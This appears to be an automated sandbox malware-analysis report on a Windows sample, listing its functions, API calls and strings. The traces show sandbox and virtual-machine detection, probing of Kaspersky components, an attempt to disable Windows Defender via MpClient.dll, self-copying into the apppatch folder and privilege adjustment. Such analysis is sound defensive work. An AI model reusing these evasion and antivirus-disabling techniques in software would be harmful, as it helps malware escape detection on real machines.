PathFileExistsA 21304->21305 21306 402af2 GetSystemWindowsDirectoryA 21305->21306 21307 402bf9 _snprintf CopyFileA 21305->21307 21308 402b07 21306->21308 21309 402d26 21307->21309 21310 402c36 21307->21310 21308->21308 21311 402b0f GetModuleHandleA 21308->21311 21344 4012b0 VirtualQuery GetModuleFileNameA PathFileExistsA 21309->21344 21312 402930 9 API calls 21310->21312 21313 402b67 21311->21313 21314 402b47 GetProcAddress 21311->21314 21315 402c3f 21312->21315 21317 402b96 GetTickCount 21313->21317 21318 402b6d 21313->21318 21314->21313 21316 402b59 GetCurrentProcess 21314->21316 21356 401b20 21315->21356 21316->21313 21425 401390 GetTickCount GetModuleHandleA GetProcAddress 21317->21425 21318->21307 21322 402ba2 21426 401420 GetTickCount GetModuleHandleA GetProcAddress 21322->21426 21326 402c59 RtlImageNtHeader 21328 402c64 21326->21328 21329 402c7d GetProcessHeap HeapValidate 21326->21329 21327 402c9d 21403 401be0 CreateFileA 21327->21403 21385 401000 21328->21385 21329->21327 21332 402c92 GetProcessHeap HeapFree 21329->21332 21332->21327 21334 402c7b 21334->21329 21335 402cef 21338 402cff GlobalFindAtomA 21335->21338 21414 4014b0 memset memset lstrcpynA CreateProcessA 21335->21414 21336 402ccf GetProcAddress 21336->21335 21337 402ce1 GetCurrentProcess 21336->21337 21337->21335 21339 402d1b GlobalAddAtomA 21338->21339 21340 402d0f 21338->21340 21339->21309 21342 4012b0 9 API calls 21340->21342 21343 402d14 ExitProcess 21342->21343 21345 40137f 21344->21345 21346 40130c GetTempPathA GetTempFileNameA MoveFileExA 21344->21346 21345->21203 21346->21345 21347 401353 SetFileAttributesA DeleteFileA 21346->21347 21347->21345 21348 401373 MoveFileExA 21347->21348 21348->21345 21349->21164 21350->21184 21351->21203 21352->21209 21353->21208 21354->21274 21355->21278 21357 401bd7 21356->21357 21358 401b3b 21356->21358 21369 401150 21357->21369 21359 401150 16 API calls 21358->21359 21360 401b44 21359->21360 21360->21357 21361 401b4e RtlImageNtHeader 21360->21361 21362 401bb5 GetProcessHeap HeapValidate 21361->21362 21363 401b5b GetTickCount GetModuleHandleA 21361->21363 21362->21357 21366 401bcb GetProcessHeap HeapFree 21362->21366 21364 401b95 21363->21364 21365 401b7e GetProcAddress 21363->21365 21368 401000 20 API calls 21364->21368 21365->21364 21367 401b8e 21365->21367 21366->21357 21367->21364 21368->21362 21370 401166 CreateFileA 21369->21370 21371 40127b 21369->21371 21370->21371 21372 401188 GetFileSizeEx 21370->21372 21373 401282 IsBadWritePtr 21371->21373 21374 401291 21371->21374 21375 4011a7 GetProcessHeap RtlAllocateHeap 21372->21375 21381 40124a 21372->21381 21373->21374 21374->21326 21374->21327 21376 4011d5 21375->21376 21377 4011c6 memset 21375->21377 21379 4011dc SetFilePointer LockFile ReadFile UnlockFile 21376->21379 21376->21381 21377->21376 21378 40125f GetHandleInformation 21378->21371 21380 40126e 21378->21380 21379->21381 21382 401228 GetProcessHeap HeapValidate 21379->21382 21380->21371 21383 401274 FindCloseChangeNotification 21380->21383 21381->21371 21381->21378 21382->21381 21384 40123e GetProcessHeap HeapFree 21382->21384 21383->21371 21384->21381 21386 401017 21385->21386 21388 401139 21385->21388 21387 401028 CreateFileA 21386->21387 21386->21388 21387->21388 21389 40104a 21387->21389 21388->21334 21427 401e00 GetCurrentThread OpenThreadToken 21389->21427 21392 401053 ConvertStringSecurityDescriptorToSecurityDescriptorW 21393 4010aa SetFilePointer LockFile WriteFile UnlockFile 21392->21393 21394 40106a GetSecurityDescriptorSacl 21392->21394 21395 401105 21393->21395 21396 4010f5 SetEndOfFile 21393->21396 21397 4010a0 LocalFree 21394->21397 21398 40108b SetNamedSecurityInfoA 21394->21398 21399 401113 GetHandleInformation 21395->21399 21400 40112f 21395->21400 21396->21395 21397->21393 21398->21397 21399->21400 21401 401122 21399->21401 21400->21334 21401->21400 21402 401128 FindCloseChangeNotification 21401->21402 21402->21400 21404 401c12 GetFileTime 21403->21404 21405 401ca5 MoveFileExA GetModuleHandleA 21403->21405 21406 401c30 GetHandleInformation 21404->21406 21407 401c4c CreateFileA 21404->21407 21405->21335 21405->21336 21406->21407 21408 401c3f 21406->21408 21407->21405 21409 401c6b SetFileTime 21407->21409 21408->21407 21410 401c45 CloseHandle 21408->21410 21409->21405 21411 401c89 GetHandleInformation 21409->21411 21410->21407 21411->21405 21412 401c98 21411->21412 21412->21405 21413 401c9e CloseHandle 21412->21413 21413->21405 21415 401533 21414->21415 21416 40158f 21414->21416 21417 401545 GetHandleInformation 21415->21417 21418 40155d 21415->21418 21416->21338 21417->21418 21421 401550 21417->21421 21419 401581 21418->21419 21420 401569 GetHandleInformation 21418->21420 21419->21338 21420->21419 21422 401574 21420->21422 21421->21418 21423 401556 CloseHandle 21421->21423 21422->21419 21424 40157a CloseHandle 21422->21424 21423->21418 21424->21419 21425->21322 21426->21318 21428 401e21 GetCurrentProcess OpenProcessToken 21427->21428 21429 401e38 LookupPrivilegeValueA 21427->21429 21428->21429 21430 40104f 21428->21430 21431 401e82 FindCloseChangeNotification 21429->21431 21432 401e5b AdjustTokenPrivileges 21429->21432 21430->21392 21430->21393 21431->21430 21432->21431 21433 401e75 GetLastError 21432->21433 21433->21431 21434 401e7f 21433->21434 21434->21431 21437 401cb0 VirtualQuery 21438 406a70 GetPEB 21440 406b60 GetPEB GetPEB GetPEB 21436 4000f1 32 API calls 21439 403699 58 API calls 21435 40219a FreeLibrary

                                                                                                                                                                                                              Executed Functions

                                                                                                                                                                                                              Function 00402D30 Relevance: 64.9, APIs: 28, Strings: 9, Instructions: 157librarywindowCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 0 402d30-402d62 LoadLibraryA GetModuleFileNameA call 403a20 3 402d64-402d66 ExitProcess 0->3 4 402d6c-402d87 call 4021d0 call 4020e0 FindWindowA 0->4 9 402da1-402dbf call 402360 call 402450 call 402540 call 402680 IsUserAnAdmin 4->9 10 402d89-402d9b GetTickCount PostMessageA 4->10 19 402dc1-402dc8 call 401ea0 9->19 20 402de3-402dfb IsUserAnAdmin GetModuleHandleA 9->20 10->9 28 402dd2-402dd9 call 403560 19->28 29 402dca-402dcc ExitProcess 19->29 22 402e1c-402e20 20->22 23 402dfd-402e0d GetProcAddress 20->23 26 402e22-402e24 22->26 27 402e6e-402e70 22->27 23->22 25 402e0f-402e19 GetCurrentProcess 23->25 25->22 32 402e26-402e3a StrStrIA 26->32 33 402e3c-402e5a call 402930 GetCurrentProcessId call 401670 Sleep 26->33 30 402e76-402e8a StrStrIA 27->30 31 402efd-402f16 call 402930 GlobalFindAtomA 27->31 28->20 51 402ddb-402ddd ExitProcess 28->51 36 402ea1-402eb4 call 402a70 GlobalFindAtomA 30->36 37 402e8c-402e9c call 402930 call 4028d0 30->37 48 402f58-402f5a ExitProcess 31->48 49 402f18-402f27 GlobalAddAtomA IsUserAnAdmin 31->49 32->33 38 402e5f-402e64 call 402a70 call 4012b0 32->38 33->48 53 402ef6-402efb call 4012b0 36->53 54 402eb6-402ec5 GlobalAddAtomA IsUserAnAdmin 36->54 37->48 64 402e69 38->64 56 402f39-402f42 IsUserAnAdmin 49->56 57 402f29-402f31 49->57 53->48 60 402ed7-402ee0 IsUserAnAdmin 54->60 61 402ec7-402ecf 54->61 62 402f44 56->62 63 402f49-402f51 call 4015a0 56->63 57->56 67 402ee2 60->67 68 402ee7-402eef call 4015a0 60->68 61->60 62->63 63->48 74 402f53 call 401670 63->74 64->48 67->68 68->53 75 402ef1 call 401670 68->75 74->48 75->53
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(user32.dll), ref: 00402D41
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00402D55
                                                                                                                                                                                                                • Part of subcall function 00403A20: RegOpenKeyExA.KERNEL32(80000002,HARDWARE\DESCRIPTION\System,00000000,00000101,?), ref: 00403A60
                                                                                                                                                                                                                • Part of subcall function 00403A20: RegQueryValueExA.KERNEL32(80000002,SystemBiosVersion,00000000,00000007,?,00000400), ref: 00403A85
                                                                                                                                                                                                                • Part of subcall function 00403A20: RegCloseKey.ADVAPI32(?), ref: 00403A93
                                                                                                                                                                                                                • Part of subcall function 00403A20: GetUserNameA.ADVAPI32(?,00000104), ref: 00403AD9
                                                                                                                                                                                                                • Part of subcall function 00403A20: CharUpperA.USER32(?), ref: 00403AE6
                                                                                                                                                                                                                • Part of subcall function 00403A20: strstr.MSVCRT ref: 00403AFE
                                                                                                                                                                                                                • Part of subcall function 00403A20: strstr.MSVCRT ref: 00403B17
                                                                                                                                                                                                                • Part of subcall function 00403A20: strstr.MSVCRT ref: 00403B30
                                                                                                                                                                                                                • Part of subcall function 00403A20: GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 00403B49
                                                                                                                                                                                                                • Part of subcall function 00403A20: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00403B6D
                                                                                                                                                                                                                • Part of subcall function 00403A20: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00403BA7
                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00402D66
                                                                                                                                                                                                              • FindWindowA.USER32(____AVP.Root,00000000), ref: 00402D7D
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00402D89
                                                                                                                                                                                                              • PostMessageA.USER32(00000000,00000466,00010001,00000000), ref: 00402D9B
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 00402DBB
                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00402DCC
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1740350354.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_5AFlyarMds.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Namestrstr$ExitFileModuleProcessUser$AdminCharCloseCountDirectoryFindInformationLibraryLoadMessageOpenPostQuerySystemTickUpperValueVolumeWindowWindows
                                                                                                                                                                                                              • String ID: IsWow64Process$Pnv$Wed Jul 6 06:49:26 20112$\apppatch\$____AVP.Root$explorer.exe$kernel32.dll$user32.dll$winlogon.exe
                                                                                                                                                                                                              • API String ID: 3353599405-3115938722
                                                                                                                                                                                                              • Opcode ID: 3ea638118beff029f17ac0200bc0c4ed4c7c13e890bf55d737871981aa78e3ae
                                                                                                                                                                                                              • Instruction ID: a3246fa232e6b5ad05535f44e20517c4174ab377f4a657e755d7089196f7c676
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3ea638118beff029f17ac0200bc0c4ed4c7c13e890bf55d737871981aa78e3ae
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 085161B0640212ABDB1077B1DF0EB5B3668AF90785F10413ABB05F51E1DBFC9D818AAD
                                                                                                                                                                                                              Function 00403A20 Relevance: 47.4, APIs: 15, Strings: 12, Instructions: 134registrystringCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 129 403a20-403a68 RegOpenKeyExA 130 403a6a-403a8d RegQueryValueExA 129->130 131 403acd-403b05 GetUserNameA CharUpperA strstr 129->131 134 403a9b-403aac RegCloseKey 130->134 135 403a8f-403a99 RegCloseKey 130->135 132 403beb 131->132 133 403b0b-403b1e strstr 131->133 137 403bec-403bf2 132->137 133->132 136 403b24-403b37 strstr 133->136 134->131 138 403aae-403ab5 134->138 135->131 136->132 139 403b3d-403b7b GetSystemWindowsDirectoryA GetVolumeInformationA 136->139 138->131 140 403ab7-403abe 138->140 139->132 141 403b7d-403b82 139->141 140->131 142 403ac0-403ac7 140->142 141->132 143 403b84-403b89 141->143 142->131 142->137 143->132 144 403b8b-403b90 143->144 144->132 145 403b92-403b97 144->145 145->132 146 403b99-403bc3 GetModuleFileNameA StrStrIA 145->146 146->132 147 403bc5-403bd5 StrStrIA 146->147 147->132 148 403bd7-403be7 StrStrIA 147->148 148->132 149 403be9 148->149 149->132
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000002,HARDWARE\DESCRIPTION\System,00000000,00000101,?), ref: 00403A60
                                                                                                                                                                                                              • RegQueryValueExA.KERNEL32(80000002,SystemBiosVersion,00000000,00000007,?,00000400), ref: 00403A85
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00403A93
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00403A9F
                                                                                                                                                                                                              • GetUserNameA.ADVAPI32(?,00000104), ref: 00403AD9
                                                                                                                                                                                                              • CharUpperA.USER32(?), ref: 00403AE6
                                                                                                                                                                                                              • strstr.MSVCRT ref: 00403AFE
                                                                                                                                                                                                              • strstr.MSVCRT ref: 00403B17
                                                                                                                                                                                                              • strstr.MSVCRT ref: 00403B30
                                                                                                                                                                                                              • GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 00403B49
                                                                                                                                                                                                              • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00403B6D
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00403BA7
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\sand-box\), ref: 00403BBF
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\cwsandbox\), ref: 00403BD1
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\sandbox\), ref: 00403BE3
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1740350354.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_5AFlyarMds.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: strstr$CloseName$CharDirectoryFileInformationModuleOpenQuerySystemUpperUserValueVolumeWindows
                                                                                                                                                                                                              • String ID: E$HARDWARE\DESCRIPTION\System$M$MALNETVM$Q$SANDBOX$SystemBiosVersion$U$VIRUSCLONE$\cwsandbox\$\sand-box\$\sandbox\
                                                                                                                                                                                                              • API String ID: 1431998568-3499098167
                                                                                                                                                                                                              • Opcode ID: 3caa7bba4dd23b12010071394e2641878e1989dd699c05cb0f3a9ea1e275d5a5
                                                                                                                                                                                                              • Instruction ID: bae6937ecf4d77d63e68da0d133f8e08c9265e2213eddde9df9132157c3c9a9d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3caa7bba4dd23b12010071394e2641878e1989dd699c05cb0f3a9ea1e275d5a5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A841B8B1944218ABDB20DB54CD89FDF7B7C9B84705F1440AAE704B61C0D779AB448F98
                                                                                                                                                                                                              Function 004021D0 Relevance: 36.8, APIs: 3, Strings: 18, Instructions: 81fileCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 150 4021d0-40231e CreateFileA 151 402350-402355 150->151 152 402320-40234a DeviceIoControl CloseHandle 150->152 152->151
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileA.KERNEL32(\\.\KmxAgent,00000000,00000000,00000000,00000003,00000080,00000000), ref: 00402313
                                                                                                                                                                                                              • DeviceIoControl.KERNEL32(00000000,86000054,000000B4,000000B4,?,00000004,?,00000000), ref: 00402343
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040234A
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1740350354.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_5AFlyarMds.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseControlCreateDeviceFileHandle
                                                                                                                                                                                                              • String ID: "$"$0$4$D$E$E$S$T$\\.\KmxAgent$d$e$g$m$m$s$t$t
                                                                                                                                                                                                              • API String ID: 33631002-3172865025
                                                                                                                                                                                                              • Opcode ID: e3633c6c15a619a578893c9fcc23eeae2132ba8b67b3abd9a16308d2c93bcb98
                                                                                                                                                                                                              • Instruction ID: 06d3a0cb986842bbdb89303b9aef8d686ca65c5df34e7f93c7eeed45953a557b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e3633c6c15a619a578893c9fcc23eeae2132ba8b67b3abd9a16308d2c93bcb98
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8E4184B0D01358DEEB20CF9599887DEBFB5BB04309F5081ADD6586B241C7BA0A89CF55
                                                                                                                                                                                                              Function 00401150 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 133memoryfileCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 153 401150-401160 154 401166-401182 CreateFileA 153->154 155 40127b-401280 153->155 154->155 156 401188-4011a1 GetFileSizeEx 154->156 157 401282-40128f IsBadWritePtr 155->157 158 40129f 155->158 161 401254-40125d 156->161 162 4011a7-4011c4 GetProcessHeap RtlAllocateHeap 156->162 159 4012a1-4012a7 157->159 160 401291-40129c 157->160 158->159 161->155 165 40125f-40126c GetHandleInformation 161->165 163 4011d5-4011da 162->163 164 4011c6-4011d2 memset 162->164 163->161 166 4011dc-401226 SetFilePointer LockFile ReadFile UnlockFile 163->166 164->163 165->155 167 40126e-401272 165->167 168 401251 166->168 169 401228-40123c GetProcessHeap HeapValidate 166->169 167->155 170 401274-401275 FindCloseChangeNotification 167->170 168->161 171 40124a 169->171 172 40123e-401244 GetProcessHeap HeapFree 169->172 170->155 171->168 172->171
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileA.KERNEL32(G,@,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,00000000,?,?,?,00401B44,00000000,00000000), ref: 00401177
                                                                                                                                                                                                              • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,00401B44,00000000,00000000,?,00000000,00402C47), ref: 00401193
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,?,?,00401B44,00000000,00000000,?,00000000,00402C47), ref: 004011B3
                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000,?,?,?,00401B44,00000000,00000000,?,00000000,00402C47), ref: 004011BA
                                                                                                                                                                                                              • memset.MSVCRT ref: 004011CD
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00401B44), ref: 004011EA
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,00401B44), ref: 004011FA
                                                                                                                                                                                                              • ReadFile.KERNEL32(00000000,00000000,?,00000000,00000000,?,?,?,00401B44), ref: 00401209
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00401B44,00000000,?,00000000,?,?,?,00401B44), ref: 0040121C
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401231
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 00401234
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401241
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 00401244
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000,?,?,?,00401B44,00000000,00000000), ref: 00401264
                                                                                                                                                                                                              • FindCloseChangeNotification.KERNEL32(00000000,?,?,?,00401B44,00000000,00000000), ref: 00401275
                                                                                                                                                                                                              • IsBadWritePtr.KERNEL32(?,00000004,00000000,?,00000000,?,?,?,00401B44,00000000,00000000,?,00000000,00402C47), ref: 00401285
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1740350354.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_5AFlyarMds.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileHeap$Process$AllocateChangeCloseCreateFindFreeHandleInformationLockNotificationPointerReadSizeUnlockValidateWritememset
                                                                                                                                                                                                              • String ID: G,@
                                                                                                                                                                                                              • API String ID: 213124939-3313068137
                                                                                                                                                                                                              • Opcode ID: c87fe8c59a66a8ba2057550360fc396b9d9c5c1a7bae7684166c86d3e9f90a93
                                                                                                                                                                                                              • Instruction ID: a7140257f329b7de85cf1082c2828f4b6f45ca3281c26892c76bebf1ae027e6a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c87fe8c59a66a8ba2057550360fc396b9d9c5c1a7bae7684166c86d3e9f90a93
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2C4167B1A00214BBEB109F959D89FAFBB7CEF84B11F10416AFB05F62D0D77459448BA8
                                                                                                                                                                                                              Function 004020E0 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 68libraryloaderCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 274 4020e0-40213c memset SHGetFolderPathA 275 4021a7-4021a9 274->275 276 40213e-40215f PathAppendA SetCurrentDirectoryA 274->276 278 4021b2-4021c2 275->278 279 4021ab-4021ac FreeLibrary 275->279 276->275 277 402161-402173 LoadLibraryA 276->277 277->275 280 402175-402183 GetProcAddress 277->280 279->278 280->275 281 402185-402192 280->281 281->275
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 0040211E
                                                                                                                                                                                                              • SHGetFolderPathA.SHELL32(00000000,00000026,00000000,00000000,?), ref: 00402134
                                                                                                                                                                                                              • PathAppendA.SHLWAPI(?,Windows Defender), ref: 0040214A
                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(?), ref: 00402157
                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(MpClient.dll), ref: 00402166
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,WDEnable), ref: 0040217B
                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 004021AC
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1740350354.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_5AFlyarMds.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: LibraryPath$AddressAppendCurrentDirectoryFolderFreeLoadProcmemset
                                                                                                                                                                                                              • String ID: MpClient.dll$WDEnable$Windows Defender$v-@
                                                                                                                                                                                                              • API String ID: 1010965793-1794910726
                                                                                                                                                                                                              • Opcode ID: 9a8801f81893ad2c186c2148835d49196fca5eda48d8657e7ad32c24086763b8
                                                                                                                                                                                                              • Instruction ID: 6149f717096a9febd0c21d278ea6f34184d08bed9f30ffe58492fd99f82aed82
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9a8801f81893ad2c186c2148835d49196fca5eda48d8657e7ad32c24086763b8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5A11D5B2940318BFD7219FA4DD49FAEB76CEB48710F00037AF705B22C0D27C4A418AA8
                                                                                                                                                                                                              Function 00401B20 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 66memorylibraryloaderCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 283 401b20-401b35 284 401bd7-401bdd 283->284 285 401b3b-401b48 call 401150 283->285 285->284 288 401b4e-401b59 RtlImageNtHeader 285->288 289 401bb5-401bc9 GetProcessHeap HeapValidate 288->289 290 401b5b-401b7c GetTickCount GetModuleHandleA 288->290 289->284 293 401bcb-401bd1 GetProcessHeap HeapFree 289->293 291 401b95-401bb0 call 401000 290->291 292 401b7e-401b8c GetProcAddress 290->292 291->289 292->291 294 401b8e 292->294 293->284 294->291
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00401150: CreateFileA.KERNEL32(G,@,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,00000000,?,?,?,00401B44,00000000,00000000), ref: 00401177
                                                                                                                                                                                                                • Part of subcall function 00401150: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,00401B44,00000000,00000000,?,00000000,00402C47), ref: 00401193
                                                                                                                                                                                                                • Part of subcall function 00401150: GetProcessHeap.KERNEL32(00000008,?,?,?,?,00401B44,00000000,00000000,?,00000000,00402C47), ref: 004011B3
                                                                                                                                                                                                                • Part of subcall function 00401150: RtlAllocateHeap.NTDLL(00000000,?,?,?,00401B44,00000000,00000000,?,00000000,00402C47), ref: 004011BA
                                                                                                                                                                                                                • Part of subcall function 00401150: memset.MSVCRT ref: 004011CD
                                                                                                                                                                                                                • Part of subcall function 00401150: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00401B44), ref: 004011EA
                                                                                                                                                                                                                • Part of subcall function 00401150: LockFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,00401B44), ref: 004011FA
                                                                                                                                                                                                                • Part of subcall function 00401150: ReadFile.KERNEL32(00000000,00000000,?,00000000,00000000,?,?,?,00401B44), ref: 00401209
                                                                                                                                                                                                                • Part of subcall function 00401150: UnlockFile.KERNEL32(00000000,00401B44,00000000,?,00000000,?,?,?,00401B44), ref: 0040121C
                                                                                                                                                                                                                • Part of subcall function 00401150: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401231
                                                                                                                                                                                                                • Part of subcall function 00401150: HeapValidate.KERNEL32(00000000), ref: 00401234
                                                                                                                                                                                                                • Part of subcall function 00401150: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401241
                                                                                                                                                                                                                • Part of subcall function 00401150: HeapFree.KERNEL32(00000000), ref: 00401244
                                                                                                                                                                                                              • RtlImageNtHeader.NTDLL(00000000), ref: 00401B4F
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00401B63
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 00401B74
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 00401B84
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401BBE
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 00401BC1
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401BCE
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 00401BD1
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1740350354.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_5AFlyarMds.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$File$Process$FreeValidate$AddressAllocateCountCreateHandleHeaderImageLockModulePointerProcReadSizeTickUnlockmemset
                                                                                                                                                                                                              • String ID: G,@$RtlUniform$ntdll.dll
                                                                                                                                                                                                              • API String ID: 3168189189-905597979
                                                                                                                                                                                                              • Opcode ID: 2010ef54e731929bdeef478eef36219a5a0ac2089432c3df2103351bfe7421e8
                                                                                                                                                                                                              • Instruction ID: 64d0ad1f4564684b16137518c26293c6cc216b866d3c13d6df455aa1ddd35d97
